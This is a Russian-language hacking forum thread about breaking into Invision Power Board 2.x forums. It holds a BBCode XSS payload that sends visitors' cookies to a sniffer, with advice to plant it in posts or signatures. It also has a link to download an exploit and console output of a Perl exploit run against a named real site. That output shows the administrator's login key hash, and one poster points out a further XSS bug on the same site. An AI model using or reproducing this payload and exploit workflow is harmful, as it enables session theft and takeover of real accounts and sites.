что тебе ещё давать???????? и так всё понятно! 1.зайди на вышк указанный сайт => Exploits => там ищи сплойты для IPB 2.0.1 2.воспользуйся поиском по форуму! тут уже не раз давали прямую ссылку на тему, но попробуй сам поискать...
Я бы дал такую ссылку. Там всё есть. А от собственного нежелания искать (между прочим, за 10 минут можно управиться) нечего напрягать других.
Код XSS HTML: [COLOR=[IMG]http://aaa.aa/=`aaa.jpg[/IMG]]` style=background:url(javascript:document.images[1].src="Адрес_Сниффера?"+document.cookie) [/COLOR] Сплоит качай тут (Исправленный) www.barsik.jino-net.ru/ipb.rar Сплоит удалю сегодня вечером так что качай
Код Xss, который тебе дали нужно отредактировать под свой или ачатовский, или любой другой сниффер, а потом запостить всё это на форуме или втыкнуть в подпись и ждать пока придут куки..... Спрашивай, что не понятно, если сам знаю, то объясню-)))) И не забывай про репутацию...;-)
C:\>c:\perl\sploit\ipb.pl www.himclan.com /forum/ 1 1 [~] SERVER : www.himclan.com [~] PATH : /forum/ [~] MEMBER ID : 1 [~] TARGET : 1 - IPB 2.* [~] SEARCHING PASSWORD ... [|]Can't use an undefined value as a symbol reference at c:\perl\sploit\ipb.pl line 134. сплоит вот что пишет что значит?
Нет не обязательно. У меня такое бывает довольно часто. А раза с пятого хэшик получаю. Хотя может ошибка и другая была
Это значит что сплоит получает в ответ символ, который не может корректно обработать, зависит не от сплоита, а от ответа сервера который бомбишь.
Да все работает... Вот вам Хэш Админа C:\Tools\Программы>perl ipb.pl www.himclan.com /forum/ 1 1 [~] SERVER : www.himclan.com [~] PATH : /forum/ [~] MEMBER ID : 1 [~] TARGET : 1 - IPB 2.* [~] SEARCHING PASSWORD ... [ DONE ] MEMBER ID : 1 MEMBER_LOGIN_KEY : b65e23ca7ec5961b2c6710237c988e48 Не забудьте про репутацию ) PS На форуме присутствует также XSS Баг )
Эге... Могу еще один сплоит посоветовать, если найдешь... ipb_skides.pl Классная тема... Нужная, найдешь береги, не давай никому...
